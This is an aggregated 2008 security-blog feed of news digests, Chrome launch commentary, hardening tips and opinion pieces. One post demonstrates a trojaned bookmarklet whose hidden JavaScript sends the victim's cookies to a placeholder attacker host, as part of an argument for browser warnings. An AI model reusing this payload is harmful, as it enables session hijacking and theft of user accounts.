Tuesday, September 2, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Security Briefing: September 2nd [Liquidmatrix Security Digest]

Posted: 02 Sep 2008 06:14 AM CDT

newspapera.jpg

Tuesday (and September) has arrived. That new(ish) project that I mentioned last week is my way of kicking myself in the backside. I have been building some girth over the last few months and now it has to come off. Today is the beginning of the midsection meltdown. I have a new gym membership in hand and I’m ready to get it done.

Click here to subscribe to Liquidmatrix Security Digest!.

And now, the news…

  1. Mythbusters Gagged: Credit Card Companies Kill Episode Exposing RFID Security Flaws | The Consumerist
  2. S.Korean Army Officers Hit by N.Korean Spyware | Chosun
  3. Health staff told to hand over patient files held on computer | The Scotsman
  4. “Hacker” gains access to Kansas Health Policy Authority data | KTKA
  5. Analysts say state must invest in online security | Daily News Egypt
  6. Code Signing in Adobe AIR | Dr Dobb’s
  7. The endless search for security | BBC News
  8. Let's fix the Web | GNUCITIZEN

Tags: , , , ,

Attack Visualizations Using GraphViz and Google Earth [BlogInfoSec.com]

Posted: 02 Sep 2008 06:00 AM CDT

There is a saying, a picture is worth more than a thousand words. This certainly holds true, especially with determining the source of network attacks and what kind of network attacks are at your edge or internal networks. We are going to explore two kinds of visualizations that use the same data source, but convey very different messages. The sources of data is the net-flow traffic summary that can be generated by Argus or network devices and security event logs that are generated from your SIEM (in my case, OSSIM). From the net-flow traffic summary, we’re only interested in the source and destination IP addresses and ports, as this is all in which is required for matching threats identified by the SIEM.

The first tool that we will employ to help create the first visualization is GraphViz (http://www.graphviz.org/). GraphViz uses a relationship language called DOT, whose grammar is easy to understand and interpret by two easy steps: define a graph and create relationships. For our purpose, we want to create a flow graph that helps us visualize attackers, and possibly further define attack types. To do so, we simple write a script that will parse the net-flow data from our network, and query those IP addresses against our SIEM’s threat database. If there is a match on the IP address, we can change the context of the relationship in the visualization. For instance, if the source is an internal IP address going out, we can color the bubble red based on the assumption that it is infected. The lines that radiate from that host can have two relationships, a solid for TCP protocols and dotted for UDP with a label on the line for the communicating port. If there is a virus infection running amok in the network, you can then imagine the visualization that is rendered, and further more if there is a Command and Control in use it may become more easily identifiable. With the discussion above, you would have the following DOT syntax, and once rendered the following graph snippet that shows a spoofed UDP communication going to my DNS server, along with hosts attacking it.

The second tool we will use is Google Earth. The technique used above to extract the information will be slightly modified; we wont use source or destination ports, and we also wont be as fancy with our line classifications. What we will add to the information is a Geo Location database so that we can lookup the IP address and get a latitude and longitude, and we’ll only consider three forms of communications: clean (green), hostile (red), and live hostile (purple).

(...)
Read the rest of Attack Visualizations Using GraphViz and Google Earth (178 words)


© Russell Handorf for BlogInfoSec.com, 2008. | Permalink | No comment
Want more on these topics ? Browse the archive of posts filed under Technical.

This feed is copyrighted by bloginfosec.com. The feed may be syndicated only with our permission. If you feel that this feed is being syndicated by a website other than through us or one of our partners, please contact bloginfosec.com immediately at copyright_at_bloginfosec.com. Thank you!

Google Chrome [GNUCITIZEN]

Posted: 02 Sep 2008 05:51 AM CDT

It is true what many of you have heard. Google is releasing their own browser. Google Chrome, as they call it, is based on WebKit rendering engine and introduces some novel approaches to interacting with web technologies. I must say, it is very exciting to see all of this happening.

Valley Wars: The Third Browser War

What makes Google Chrome different is its architecture. The browser is no longer single-threaded process. Each tab is actually a separate process with own memspace. I am not sure if we are talking about threads or actual program instances but what is more important is that when you close a tab, you are virtually terminating the process. At least, this is what Google says.

This seams to have some interesting implications on the security of the browser. If you corrupt the tab’s memspace then you will cache only that particular process. The browser and all other tabs should continue working just fine like nothing ever has happened. This approach has its own advantages and disadvantages. The advantages are obvious: the user experience is intact. The disadvantages are that pwning might get easier. It is very early to me to say more on this topic because I haven’t seen Google Chrome in action, but I have the slight suspicion that there will be some security consequences as a result of this security model.

Google Chrome also implements a new privacy feature. I think they call it incognito or something. Basically if you browser while being in incognito mode, nothing ever gets logged. I think that this is a cool feature and I believe that the IE8 team is working on something similar.

Another interesting feature which I need to mention is that popups are not blocked but they open in a minimized window. If you want to see them you just drag the popup icon and there you go. Again, this is very interesting but I can already see how this may be abused. For example, it will make a huge difference if the rendering engine has already processed the content of the popup even if it is minimized. If this is the case, then this feature could turn into a very handy mechanism of hiding malicious activities. For example, if during the attack, the page flickers or the attacker is rendering too many corrupted ANIs :) then certainly, hiding it behind a minimized popup will be a great way of avoiding detection by casual observation. Of course these are pure speculations.

Google Chrome also provides sandboxing functionalities. Apparently each process is sandboxed but I have no details how was that implemented. I would say that perhaps sandboxing JavaScript is fairly easy but doing that on a process level may not be as much. Maybe each process runs with unprivileged account which does not have many rights. But still, it must have some rights in order to do something. So taking over a process may not result into an immediate pwnage but it will certainly give the attackers some advantage. I am very interested to learn how this sandboxing mechanism is implemented for the various operating systems if the browser is cross-platformed of course, which I believe is the case.

If everything is implemented correctly, which I hardly doubt, then Google Chrome may turn into a very nice technology I may consider using it in the near future. However, none of these security features interest me as much as those that allow me to prevent poorly coded web applications leaking my details over unencrypted channels. Or even features which will prevent certain types of CSRF and XSS attacks. I’ve said it before! Most of my data does not reside on my computer any more. Of course this philosophy had some bad side effects on me, but my point is that the data is on the Web and therefore I am concerned how my browser protects me when it comes down to Web related bugs. I believe that Google Chrome lacks mostly that and if they decide to implement any of recommendations then in my eyes, I will certainly have a winner in the upcoming browser wars.

The 7 Greatest Ideas in Security [Amrit Williams Blog]

Posted: 02 Sep 2008 01:29 AM CDT


It is easy to criticize, in fact many have built their entire careers on the foundation of “Monday morning quarter-backing”, not only is it human nature to look for improvements at the detriment of old ideas, but it is also far more humorous to point out what is wrong than to espouse the virtues of what works.

I recently posited what I believed to be the “11 Worst Ideas in Security” (here), but to every yin a yang, to every bad a good, to every Joker a Dark Knight, for the purpose of finding balance, I give to you the 7 Greatest Ideas in Information Security…

7. Microsoft and Security as part of the SDL (Lord Vader finds your lack of faith disturbing)

The greatest flaw in information security is that we try to build security on top of a fundamentally weak foundation, whether we are talking about the core routing infrastructure, the open standards and protocols that drive them or the operating systems themselves, the majority of the Information Security industry is squarely aimed at resolving issues of past incompetence. Nowhere has this been more apparent than the decades plus of vulnerabilities found in Microsoft products. Crappiness exists in other products and is not an attribute solely patented by Microsoft, they just happen to power everything from my Mom’s computer to the Death Star, so when they fail it is almost always epic.

The Microsoft SDL (here) and the work that folks like Michael Howard (here) have done to develop security into a critical aspect of the SDL is not only admirable, it is inspiring. To have witnessed a company the size of Microsoft essentially redesign internal processes to address what was seen as a fundamental deficiency and to then continue to develop these processes changes into thought leadership sets an example for all of us, small business and world dominating enterprise alike. Implementing security as part of the SDL and utilizing concepts such as threat modeling to identify weaknesses and eradicate them before releasing code to the public is arguably one of the greatest ideas in security.

6. The Principle of Least Privilege (Not all of us can know Zarathustra)

Since Saltzer and Schroeder formulated the concept as part of computing we have been striving to achieve it. It is neither new nor is it novel, but it is critical to how we design computing systems and how we develop and implement security controls. It contradicts our own Nietzschean side to feel like constraints and rules are important for the common man, but shouldn’t apply to us personally, but nothing should be afforded more privilege than needed and this is one of the “laws of security”.

5. Segmentation (Your Mendelian trait is in my algorithmic reasoning)

Segmentation of duties, of networks, of memory, of code execution, of anything and everything that should never mix. Combine lack of segmentation with a lack of implementing the principle of least privilege and you turn a simple browser based buffer overflow into a highly damaging payload that can easily replicate throughout the Internets. For us to truly realize improvements in security, as defined by less successful security incidents - real and imagined - and marked by an increase in visibility and control over all of our computing systems, segmentation of everything is an ideal to strive for.

4. Inspect what You Expect (Question everything)

Also known as “trust but verify” as used by the Gipper in his dealings with the Russians during the cold war. Trust is important, but it is even more important to validate that trust. One of the most significant changes every software developer can make today, whether they are developing COTS or internal applications, is to allow security persons to inspect that the application is functioning, being accessed, and managed to the controls that the organizations expects. From networking to applications to users to virtualization to quantum anything, this principle must extend across every layer and concept of computing today and tomorrow,

3. Independent Security Research (So, I’ve been playing with something…no not that)

The ridiculous vulnerability disclosure debate aside, independent security research has had a significant benefit on the security industry. The best example is the recent DNS vulnerability that has been discussed, dissected, and covered ad nauseam. Since it’s disclosure it has not only resulted in providing more awareness of the fundamental flaws in the core infrastructural protocols like DNS and assisted in the implementation of countermeasures, but it has actually driven government policy as the OMB (Office of Management and Budget) has recently mandated the use of DNSSEC for all government agencies (here) - Sweet!

2. Cryptography and Cryptanalysis (From Bletchley with Love)

From the Greek Historian Polybios to the German surrender in May of 1945 to ECHELON, cryptography and cryptanalysis has played a major role in our lives. It has shaped the outcome of wars and changed foreign and domestic policy. It is becoming the cornerstone of the highly distributed, intermittently connected world of technical gadgetry we live in and can make the difference between coverage on the front page of the Wall St. Journal vs. a brief mention in a disgruntled employees blog - Although I wouldn’t argue that encryption as a technology is without flaw, the theory and practice of hiding information and it’s dance partner code breaking, continue to drive some of the greatest advances in information security.

1. Planning, Preparation, and Expectation Setting (Caution: Water on Road, may make road slippery)

Yes a bit of a yawner but since the beginning of forever more failures, more disastrous outcomes and more security incidents result from a lack of proper planning, preparation and expectation setting than all the exploits of all the hackers of all the world combined. As an analyst it became shockingly clear that the majority of failed technology deployments were not the result of a failure in the technology, but a result of poor planning, a lack of preparing and little to no expectation setting, the entire “trough of disillusionment” is riddled with the waste of mismatched technological expectations. The greatest idea in security is not sexy, funny, or terribly enlightened, but it is simple, achievable, repeatable and can be immediately implemented today - plan, prepare and set the proper expectations.

Some may argue that something has been forgotten or that the order is wrong, but I would argue that we must learn to develop securely, implement the proper security controls, verify the functioning of these controls, leverage the research of the greater community, ensure that what cannot be protected is hidden, and from the beginning to the end properly plan, prepare, and set the right expectation - these are the greatest ideas in security and if we learn to embody these principles, we would be moving the industry forward as opposed to constantly feeling like we can only clean up the incompetence that surrounds us.

Google Gets Chrome On Your Browsing [Liquidmatrix Security Digest]

Posted: 01 Sep 2008 07:08 PM CDT

Google has managed to do what most people have been speculating on since they picked up the GreenBorder folks back in May 2007. Word came out today that Google will making it’s own foray into the web browser market space.

The browser named Chrome, will have it’s own Javascript virtual machine called V8. “Should had a…” a little marketing genius. One piece that I’m initially wary of is the auto-completion feature in the address bar of the browser. Personally I’m never too keen on the system trying to decide for me what I’m really looking for. Google has also taken a page from the Opera browser with their use of a “speed dial” feature which for its default home page. Imitation being the sincerest form of flattery. The google browser will also have a “porn view” mode much in the same vein of the proposed IE8 feature. Google gears will be installed by default.

From blogoscoped:

Chrome has a privacy mode; Google says you can create an "incognito" window "and nothing that occurs in that window is ever logged on your computer." The latest version of Internet Explorer calls this InPrivate. Google's use-case for when you might want to use the "incognito" feature is e.g. to keep a surprise gift a secret. As far as Microsoft's InPrivate mode is concerned, people also speculated it was a "porn mode."

I’m looking forward to getting more detail on the new browser offering when they release it tomorrow.

From Googleblog:

On the surface, we designed a browser window that is streamlined and simple. To most people, it isn’t the browser that matters. It’s only a tool to run the important stuff — the pages, sites and applications that make up the web. Like the classic Google homepage, Google Chrome is clean and fast. It gets out of your way and gets you where you want to go.

Under the hood, we were able to build the foundation of a browser that runs today’s complex web applications much better. By keeping each tab in an isolated “sandbox”, we were able to prevent one tab from crashing another and provide improved protection from rogue sites. We improved speed and responsiveness across the board. We also built a more powerful JavaScript engine, V8, to power the next generation of web applications that aren’t even possible in today’s browsers.

Looking forward to this.

Article Link

UPDATE: Google has a released a comic to explain the new release.

Google Chrome Comic

Tags: , ,

Russian Web Critic Shot Dead [Liquidmatrix Security Digest]

Posted: 01 Sep 2008 06:15 PM CDT

Free speech gets another kick in the twig and berries in Russia. Journalists and bloggers there seem to have a bad habit of dying from sudden high velocity lead poisoning. One such vocal critic of Putin and company was shot dead on Sunday under questionable circumstances. Namely, while in police custody.

Interesting wording on the cause of his death.

On Reuters:

“While police officers were attempting to transfer M. Yevloyev to an interior ministry office, an incident occurred in which M. Yevloyev received a gunshot wound to the temple area,” the agency quoted the source as saying.

On AFP:

“Along the way, a shot was involuntarily fired from a policeman’s gun and the bullet hit Yevloyev’s head,” the source was quoted as saying.

OK, I have to wonder what the Russian words for “bullshit” and “murder” are at this point.

Sadly, I have $10 that says this case will never be resolved.

Lawyers: Gonzales Mishandled Classified Data [Liquidmatrix Security Digest]

Posted: 01 Sep 2008 05:46 PM CDT

Alberto, how we’ve missed ya. Our favourite memory challenged Bush staffer is back in hot water for his apparent mishandling of secret government documents.

From WOKV:

Former Attorney General Alberto Gonzales mishandled highly classified notes about a secret counterterror program, but not on purpose, according to a memo by his legal team.

The memo, obtained by The Associated Press, acknowledges that Gonzales improperly stored notes about the program and might have taken them home at one point.

Removing secret documents from specially secured rooms violates government policy.

Gonzales’ lawyers wrote in their memo that there is no evidence the security breach resulted in secret information being viewed or otherwise exposed to anyone who was not authorized.

The classified notes focus on a March 2004 meeting with congressional leaders about a national security program that was about to expire. Efforts to renew the program sparked an intense Bush administration debate that played out at the hospital bedside of then-Attorney General John Ashcroft.

Hmm, shoud make for some interesting headlines on Tuesday. Oh wait. There’s the storm in the Gulf. And the RNC are having their shindig.

I’ll be surprised if this gets any press time on CNN, MSNBC et cetera.

For the full article, read on.

Article Link

Google Chrome Security First Look [RioSec]

Posted: 01 Sep 2008 01:37 PM CDT

Google has announced a new browser, called "Google Chrome" that aims to improve the way applications are delivered on the web.  In typical Google fashion, they've created a comic book that depicts the features of the new browser.  The browser should be officially released tomorrow at www.google.com/chrome (not yet live).  Below are a more details I've gathered about the security features of this upcoming browser.

As they say in the comic book "when we started this project, it was a very different landscape from when other browsers started."  This difference in focus is apparent due to the plethora of announced design decisions which, if done as stated, should create a much more secure browser.  Read on for some of the details.

read more

UK Hacker Gary McKinnon Loses Appeal Against Extradition [Darknet - The Darkside]

Posted: 01 Sep 2008 01:01 PM CDT

So the latest news with the Gary McKinnon case that was he was trying to fight against Extradition, he started off with Appeals against US Extradition, then he Won The Right to Lords Appeal Extradition Hearing and then he lost the Lords case then went for the European Court. Sadly it seems he lost his appeal [...]

Read the full post at darknet.org.uk

links for 2008-08-31 [Andrew Hay]

Posted: 01 Sep 2008 01:02 AM CDT

Microsoft Patents ‘Page Up’ and ‘Page Down’ [Liquidmatrix Security Digest]

Posted: 31 Aug 2008 09:17 PM CDT

Absurdity, thy name is Microsoft. I have heard of some dumbass patents over the years but, this one is an example that the US Patent Office really needs to undergo an extensive review.

From ZDNet:

The software giant applied for the patent in 2005, and was granted it on August 19, 2008. US patent number 7,415,666 describes “a method and system in a document viewer for scrolling a substantially exact increment in a document, such as one page, regardless of whether the zoom is such that some, all or one page is currently being viewed”.

The patent’s listed ‘inventors’ are Timothy Sellers, Heather Grantham and Joshua Dersch. However, Page Up and Page Down keyboard buttons have been in existence for at least quarter of a century, as evidenced by this image of a 1981 IBM PC keyboard.

Yes folks, that would be “previous art”. Hell, I still have one of those keyboards in my closet.

I’m going to bed. That’s where I get to be a Viking.

Article Link

Privay, please.. la serie continua. [varie // eventuali // sicurezza informatica]

Posted: 31 Aug 2008 05:08 AM CDT

Questa volta, per proteggere la nostra privacy, abbiamo una versione estiva grazie all'uso di un telo mare:


(grazie a Mara e/o Oreste)

Per la vostra privacy, restano sempre valide la versione da piscina, quella invernale e quella da campeggio, senza dimenticarsi la versione fru-fru.

End Summer Camp 2k8 [varie // eventuali // sicurezza informatica]

Posted: 31 Aug 2008 04:35 AM CDT

Volentieri segnalo:

SM4X

presenta

END SUMMER CAMP 2K08

19-21 settembre 2008
ART2 LOUNGE
Parco della Scultura in Architettura
via Vittorio Veneto
San Dona' di Piave (VENEZIA)

[COSA] ESC e' un incontro di persone interessate al Software Libero e alla Conoscenza Libera, a Entrata Libera :) Il contenuto dell'evento e' in continua evoluzione e viene creato dai suoi partecipanti.

[COME] Secondo la formula MUD (Miscere Utile Dulci). Sono previsti
Seminari e Talk su vari argomenti/livelli, e momenti decisamente piu' "ludici": Campeggio, Grigliata, LAN Party, etc.

[DOVE] ESC si svolge a San Dona' di Piave, in provincia di Venezia,
presso ART2 Lounge, struttura adiacente al Parco della Scultura in
Architettura: Planet Earth, 45°38'11''N - 12°32'48''E :)

[PERCHE'] Per creare un momento di aggregazione, uno scambio di
conoscenze ed esperienze tra persone che vivono il Software Libero nelle sue diverse forme, e festeggiare insieme il Software Freedom Day.

MAGGIORI INFO e SITO WEB: http://www.endsummercamp.org
"Everything's Happening under the KEY..." ;)

Let’s fix the Web [GNUCITIZEN]

Posted: 31 Aug 2008 03:12 AM CDT

I am heavily frustrated from the way the Web works today. Everything seems to be broken beyond reason. I really want to fix the damn thing but I realize that it is not up to me to do that. It is up to all of us to make sure that code is written in the most secure possible way. Can we do that? Perhaps not! What can we do then?

Broken Heart

Before I get to the point, I need to tell you how I fixed my insecure Wordpress blog. Wordpress has many security shortcomings and I was so frustrated that I decided to fix whatever I can once and for all. I believe that we can fix the Web in a similar way, but first these are all the patches that were implemented:

  1. mark all cookies as secure to prevent leakage over unencrypted channels
  2. mark all cookies as httpOnly to prevent session hijacks due to Cross-site Scripting vulnerabilities
  3. if you try to login, force SSL to prevent leakage of credentials
  4. when logged in, make sure that all URLs are HTTPS enabled to prevent leakage of sensitive information
  5. when over HTTPS make sure that all URLs that point to your domain start with https:// to prevent leakage of any data
  6. restrict 443 (HTTPS) to blog users and admins only
  7. disable error messages everywhere to prevent leakage of sensitive information
  8. allow upload of only known file types such as jpg, gif and png (I will add a check for the gifar problem soon)
  9. embed an IDS type of solution (PHPIDS in my case) to block known attacks
  10. integrate with blogsecurify to enable continues security checks and warn the admin if a problem is found

I believe that this makes the blog a lot more secure. There still might be ways to attack it but this is all I can do in the most reasonable possible way, without completely breaking Wordpress. All of these fixes are implemented as a plugin which I will make available for free download soon.

So how can we fix the Web? I have a few ideas in mind and all of them can be implemented in a plugin. Here they are:

  1. allow the user to sandbox and unsandbox applications and web resources with a single click
  2. sandbox by default known applications such as GMail, Yahoo Mail, etc.
  3. in the sandbox, mark all cookies as secure to prevent session leaks
  4. in the sandbox, mark none-session cookies as httpOnly to prevent session hijacks due to XSS
  5. make sure that while on HTTPS, all embedded resources are delivered over HTTPS as well.
  6. provide the option to turn off JavaScript, JAVA, Flash, SilverLight, etc on per-sandbox basis
  7. block any external requests to sandboxed applications
  8. implement the PHPIDS signature matching mechanism in JavaScript
  9. if the HTML structure is heavily broken, block the page to prevent some types of persistent XSS
  10. record ssl signatures on trusted network and warn if signature changes while on untrusted network

I think that this type of solution will make the Web a lot more secure. It definitely wont fix it, but it will make Sidejacking attacks not easy. It will block the majority of CSRF and XSS attacks. It will provide certain mitigations against persistent XSS attacks. It will provide some mitigations against Browser exploits which employ Flash or Java technology to root the browser. It is not perfect, but it looks good enough to me.

Next stop: fixing the browser!

PaulDotCom Security Weekly - Episode 120 - August 28, 2008 [PaulDotCom]

Posted: 30 Aug 2008 10:03 PM CDT

Paul & Larry rock out to some punk music and bring you the latest security and hacking news!

DanKLovesHackinNakedsm.jpg

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian

Email: psw@pauldotcom.com

Direct Audio Download

Audio Feeds:

QuickPwn an iPhone [Network Security Blog]

Posted: 30 Aug 2008 01:34 PM CDT

The Mac version of QuickPwn is up and worked flawlessly for me! I’ve already installed Metasploit and a terminal program, though I haven’t really had a chance to play with either of them yet. And now that I’ve written that I’m not having problems, the iPhone just rebooted on it’s own. I’ll know soon if that’s a problem of the jailbreak.

The phone’s back up but I don’t see either the Metasploit or the terminal programs available. I’ll look through to see what’s required to enable them. Got the terminal program working, now playing with some of the other capabilities built in tho Cydia.

The link on the QuickPwn developer site seems to be down, so here’s an alternative link to the QuickPwn files.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

TSA's Brand [Emergent Chaos]

Posted: 30 Aug 2008 01:01 PM CDT

Passing through Portland's PDX Airport, I was struck by this ad for SeaPort Airlines:
No TSA.jpg
Things are pretty bad for TSA when right after "faster travel," a company lists "No TSA" as its second value proposition. (Bottom left corner.)

It's actually sort of impressive how much hate and resentment the TSA has built in the few long years of its existence.

WaterISAC Document Leak Cover Up Failed [Liquidmatrix Security Digest]

Posted: 30 Aug 2008 12:49 PM CDT

Security is an interesting thing. Some people get it. Others just have no idea. A few days ago Myrcurial found that a DHS document had been erroneously posted on the Water ISAC site. Mistakes happen lets be fair. But, rather than say “Yup, we goofed. It won’t happen again and here’s why” the rather apt description of the Keystone fellas reared its head, again.

An email was sent out on the SCADA security mailing list instructing folks to cease talking about this issue (thx to anonymous for the copy).

So, being a curious sort I went to the publicly accessible archive to view the message thread so I could catch up on the story.

Only to discover that any message relating to the document posting was now deleted. Guess they might have forgotten that every subscriber on the list also has a copy.

How can one ever hope to have a frank and open discussion about security in the critical infrastructure space when the default action is to close your eyes and bury your head in the sand?

Anyway. So, I decided to go have a look at the archived document on Google. Nope, not there anymore. Guess someone had Google take the link down. Well, that showed me.

Or did it?

Oh right, there are other search engines besides Google. You might of heard of some of them like say a small little site called Yahoo?

Yup, they have an archived copy as well. As will the rest of the search engines out there.

What’s the moral of the story? Once the genie is out of the bottle on the internet there really is no way to get that sucker back in. As our readership from the various three lettered agencies can attest.

WaterISAC and other organizations that have critical infrastructure roles really need to review their document classifications and how things get published to the web. Seriously, this isn’t rocket science. Be a little more careful next time folks.

Oh, and WaterISAC, please turn off directory browsing on your web server.

Tags: , , , ,

Bookmarklet of death: Domain hijacking without 0days [GNUCITIZEN]

Posted: 30 Aug 2008 06:49 AM CDT

So we all know about cross-domain vulnerabilities that allow attackers to run code within the security context of the target domain. Typically, they are either a XSS bug on the server-side application, or a bug in the client (web browser plugin or web browser itself). Most of the times, these vulnerabilities require some type of interaction from the victim user. i.e.: being tricked to click on a link or visit a malicious page.

Now, most techies are familiar with bookmarklets. Well, what’s funny is that many users with knowledge of security - including many infosec professionals - are not aware of the security implications of running a bookmarklet.

The two most common ways to run a bookmarklet are:

  • pasting the JavaScript code - which must start with a javascript: statement - in the address bar and press ENTER
  • click on the bookmarklet under the ‘Bookmarks’ menu (must have been previously added)

On one hand, a bookmarklet is a piece of JavaScript that allows you to do something cool with the current webpage. On the other hand, from a security point of view, a bookmarklet is scripting code injection within the security context of the current domain/site by design.

Or put it this way: you’ve got the equivalent of a XSS vulnerability in the target site or a cross-domain vulnerability on the web browser. Except that you don’t need to discover a new vulnerability. No 0days required! So like in cross-domain vulnerabilities we can inject payloads that allow us to:

  • steal cookies (session hijacking)
  • scrape pages containing interesting data and submit it to the attacker’s site
  • steal usernames and passwords that are autocompleted by the browser
  • perform advanced phishing attacks. i.e.: by overwriting the login form’s action attribute or injecting a new fake login form
  • etc …

Also, as in cross-domain vulnerabilities, there is some level of user interaction required: in this case, the attacker must trick the victim to run a bookmarklet while on the target site.

So how can we increase the chance of the victim being tricked to run a bookmarklet? Well, a nice trick is to use a fun and flashy bookmarklet, such as one that reads the images of the current page and creates an animation with them. You could of course write the code from scratch, but we won’t do that as we’re too lazy aren’t we? Instead, we’ll trojan a publicly available (fun and flashy) bookmarklet with our malicious code. In this case, our malicious payload steals the victim’s cookie for the purpose of hijacking his/her session. Notice that the cookies would be sent to x.php which the attacker would need to host on his/her site. This PHP script sends any received data (cookie in this case) to the attacker’s email:

 javascript:/*%20start%20of%20evil%20code*/(function(){c=document.createElement("img");c.src="http://evil.domain.foo/x.php?"+document.cookie;c.width=0;c.height=0;document.body.appendChild(c)})();/*end%20of%20evil%20code%20*/window.scrollTo(0,%200);%20R=0;%20x1=.1;%20y1=.05;%20x2=.25;%20y2=.24;%20x3=1.6;%20y3=.24;%20x4=300;%20y4=200;%20x5=300;%20y5=200;%20DI=document.getElementsByTagName('img');%20DIL=DI.length;%20function%20A(){for(i=0;%20i-DIL;%20i++){DIS=DI[%20i%20].style;%20DIS.position='absolute';%20DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+'px';%20DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+'px'}R++}setInterval('A()',5);%20void(0); 

Notice the malicious payload is within JS comments. There is nothing special about the evil code. It simply creates an image tag which results in the victim’s cookie being sent to a third-party site in the background. The non-malicious payload will also execute, which results in the images of the current page moving around the screen. It’s quite neat, as the user won’t notice anything suspicious actually happened. Needless to say, you need to replace evil.domain.foo with the site hosting the x.php script.

You can picture this kind of attack actually happening in sites where there are cross-user functionalities. i.e.: social networking sites such as Facebook, MySpace and so on …

Thinking about the dangers of running a bookmarklet brings us to the next question:

Why in the world do browsers NOT show a warning before running a bookmarklet?

After all, browsers do display warnings for other potentially dangerous actions such as:

  • visiting a site with an invalid SSL certificate
  • clicking on a form that submits data in clear

I do understand that it would be annoying to warn users every time they run a bookmarklet, but I think it would be sensible to show a warning at least the first time a given bookmarklet is executed. If you work for a popular web browser vendor such as Microsoft or Mozilla, you can think of this as my wish for the day! I’d love to hear your feedback if you are reading this!

PhishGuru Training System [Jon's Network]

Posted: 30 Aug 2008 01:11 AM CDT

PhishGuru

PhishGuru is an email-based anti-phishing training system in which training messages are designed to look like phishing messages.

Firefox Better than Safari on MobileMe [Jon's Network]

Posted: 30 Aug 2008 12:17 AM CDT

mobileme.pngA cursory web search will show you many end users that perceive better performance using Firefox for MobileMe hosted websites instead of Apple’s own Safari browser.

My wife uses iWeb to maintain the family website. A couple of weeks ago, the comments stopped working. I figured it was just another MobileMe problem and planned on switching to Wordpress or something. Tonight we noticed that people were leaving comments. We viewed the site in Firefox and the comments worked. Comments on our MobileMe hosted webpage do not work in Safari.

Here are the comments viewed with Safari:

safari-comments.png

Here are the comments viewed with Firefox:

ff-comments-1.png

If anyone has any idea how to fix this, feel free to let me know, but I’ll probably be moving it over to another platform soon. Marsedit and Wordpress will be just as easy iWeb.

As far as I’m concerned, MobileMe is alpha software. A few minutes on their Apple’s support site shows as much.

Not the smartest... [The Security Shoggoth]

Posted: 29 Aug 2008 03:30 PM CDT

I was looking at a bot the other day I received though email. The "botmaster" (and I use that term loosely) was using mIRC-based bot, something I haven't seen in a long time. It wasn't packed, didn't perform any tricks to get installed, etc. Everything screamed amateur.

So, I ran it through my honeynet and just sat there and watched. Since it was mIRC I could open it up and just watch the channel. To my complete amazement, after confirming I was a bot (by asking me to echo some text back to him) the "botmaster" gave me admin access to the IRC channel. Huh!?!

(In the picture below the botmaster is @Gigi, my infection is @Childse.)


So, what is a self-respecting malware analyst like myself to do? Oh, I don't know. :)

2012: Internet Armegeddon, Preparing for the Eventual End [Amrit Williams Blog]

Posted: 29 Aug 2008 02:00 PM CDT


Well my friends the end is near, no more internet porn, no free downloading of pirated movies or music, and for me personally the most devastating will be the loss of LOLCatz. Recent highly public vulnerabilities against the core routing infrastructure of the Internet, such as the DNS or BGP vulnerabilities, highlight what some already knew - we have built an industry on an inherently weak foundation and these are clearly the first signs of the apocalypse.

The eventual end was prophesied in the 16th century by Nostradamus in his 15th quatrain

At the great battle of Armageddon
Shall join the crusade through packets attached among the Internets
The pertanious army of God against the army of the evil Serpent
The Dragon shall be loosened on October third in the year two-thousand and twelve

And written in the book of Revelations 9:13-17

13 And the sixth security researcher disclosed, and we heard a voice from the four horns of defcon, twitter, blogs, and the media which is before the Internets

14 Saying to the sixth security researcher which had disclosed irresponsibly, Loose the four exploits which had been bound in the great vulnerability disclosure debate

15 And the four exploits were loosed, which were prepared for an hour, and a day, and a month, and a year, for to slay the whole of the Internets

16 And the number of the army of the exploiters were twenty six hundred: and I heard the number of them

17 And thus I saw the exploits in the vision, and them that executed them, having code of buffer overflows, and of impersonation, and redirection: and the heads of the exploiters were green as the land; and out of their mouths issued forth demon tongues that spat an indistinguishable language of number and letters - urtehsuk!

It is far more likely that nothing will happen and by 2012 we will deploy converged technologies that allow one to bank online, listen to Britney’s daughters new album “Freaknut”, write their blog, program their HVAC, and toast a bagel from their wirst watch, of course some 15 year old Chinese kid with acne, an anti-social disposition and advanced computer skills will now be able to burn toast from across the world.

44 Years [Emergent Chaos]

Posted: 29 Aug 2008 11:11 AM CDT

Fannie Lou Hamer.jpg

Mary Dudziak posted the testimony of Fannie Lou Hamer before the credentials committee of the 1964 Democratic convention. It's worth reading in full:

Mr. Chairman, and to the Credentials Committee, my name is Mrs. Fannie Lou Hamer, and I live at 626 East Lafayette Street, Ruleville, Mississippi, Sunflower County, the home of Senator James O. Eastland, and Senator Stennis.

It was the 31st of August in 1962 that eighteen of us traveled twenty-six miles to the county courthouse in Indianola to try to register to become first-class citizens.

We was met in Indianola by policemen, Highway Patrolmen, and they only allowed two of us in to take the literacy test at the time. After we had taken this test and started back to Ruleville, we was held up by the City Police and the State Highway Patrolmen and carried back to Indianola where the bus driver was charged that day with driving a bus the wrong color.

After we paid the fine among us, we continued on to Ruleville, and Reverend Jeff Sunny carried me four miles in the rural area where I had worked as a timekeeper and sharecropper for eighteen years. I was met there by my children, who told me that the plantation owner was angry because I had gone down to try to register.

After they told me, my husband came, and said the plantation owner was raising Cain because I had tried to register. Before he quit talking the plantation owner came and said, "Fannie Lou, do you know - did Pap tell you what I said?"

And I said, "Yes, sir."

He said, "Well I mean that." He said, "If you don't go down and withdraw your registration, you will have to leave." Said, "Then if you go down and withdraw," said, "you still might have to go because we are not ready for that in Mississippi."

And I addressed him and told him and said, "I didn't try to register for you. I tried to register for myself."

I had to leave that same night.

On the 10th of September 1962, sixteen bullets was fired into the home of Mr. and Mrs. Robert Tucker for me. That same night two girls were shot in Ruleville, Mississippi. Also Mr. Joe McDonald's house was shot in.

And June the 9th, 1963, I had attended a voter registration workshop; was returning back to Mississippi. Ten of us was traveling by the Continental Trailway bus. When we got to Winona, Mississippi, which is Montgomery County, four of the people got off to use the washroom, and two of the people - to use the restaurant - two of the people wanted to use the washroom.

The four people that had gone in to use the restaurant was ordered out. During this time I was on the bus. But when I looked through the window and saw they had rushed out I got off of the bus to see what had happened. And one of the ladies said, "It was a State Highway Patrolman and a Chief of Police ordered us out."...

